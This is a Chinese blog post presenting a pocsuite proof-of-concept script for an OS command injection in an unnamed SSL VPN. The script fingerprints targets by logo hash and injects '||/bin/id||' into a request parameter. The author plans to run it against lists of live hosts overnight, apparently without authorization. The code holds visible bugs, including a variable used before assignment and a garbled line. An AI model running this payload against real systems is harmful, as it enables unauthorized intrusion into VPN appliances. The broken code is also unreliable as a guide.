pocsuite 实现一个verify检测功能

今天在测试中发现一个命令执行漏洞，尝试用创宇的pocsuite框架实现。说实话，这玩意儿确实没有自己写POC顺手，非得就着他的标准来，就很难受，以至于耽误了很多时间在规范上。。

影响参数后直接用||连接，然后定位linux命令如||/bin/id||

下面是代码部分，大体思路就是发送一个含有payload的post请求，由于涉及一些隐私，我下面的一些地方做了打码：

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class SSL_VPN(POCBase):
    vulID = '17'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-11-21' #漏洞公开的时间,不知道就写今天

    author = 'colorway' #  PoC作者的大名
    createDate = '2017-11-21'# 编写 PoC 的日期
    updateDate = '2017-11-21'# PoC 更新的时间,默认和编写时间一样
    references = []# 漏洞地址来源,0day不用写
    name = 'OS Command Injection'# PoC 名称
    appPowerLink = '#'# 漏洞厂商主页地址
    appName = '#'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'Command Injection'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        攻击者可拼接系统命令getshell
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    #验证漏洞 pocsuite -r xxxx-OS-Injection.py -f ip.txt --verify
    def _verify(self):
        #定义返回结果
        import hashlib
        import re
        result = {}
        #获取漏洞url
        vul_url = self.url + '/xx/xx/xx.php?xx=xx&t=1&h=127.0.0.1&p=80&c=1||/bin/id||'
        vul1_url = vul_url.replace('http', 'https')
        test_url = self.url + '/images/logo.gif'
        test1_url = test_url.replace('http', 'https')
        # print test_url
        # print test1_url
        r = req.get(test_url)
        r1 = req.get(test1_url, verify=False)
        if hashlib.md5(r1.content).hexdigest() == 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' or hashlib.md5(r2.content).hexdigest() == 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx':
            data = "xxx=1&xxx=1&auth=10&user_name=11&pass=111&xxxx=xxxx"
            cookies = {'xxxx':'aaaa','admin_token':''}
            r2 = req.post(vul_url, data=data, cookies=cookies)
            r3 = req.post(vul1_url, data=data, cookies=cookies, verify=False)
            if "uid" in r2.content or "uid" in r3.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = vul_url65             # print r2.content
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(SSL_VPN)

这里我先做了指纹识别，判断目标网站是否有logo并且logo所在文件的MD5值是否正确，是的话进入下面的代码。其他的地方就是我加了https的验证，因为一般资产导入的都是IP地址，前面没有协议的名字，所以我采用了判断两次的方法（感觉是一个笨方法，但目前没有想到其他方法，控制台参数里也没有启用https的参数选项）

今天晚上跑一下存活主机，看看明天能跑出多少台来，嘻嘻。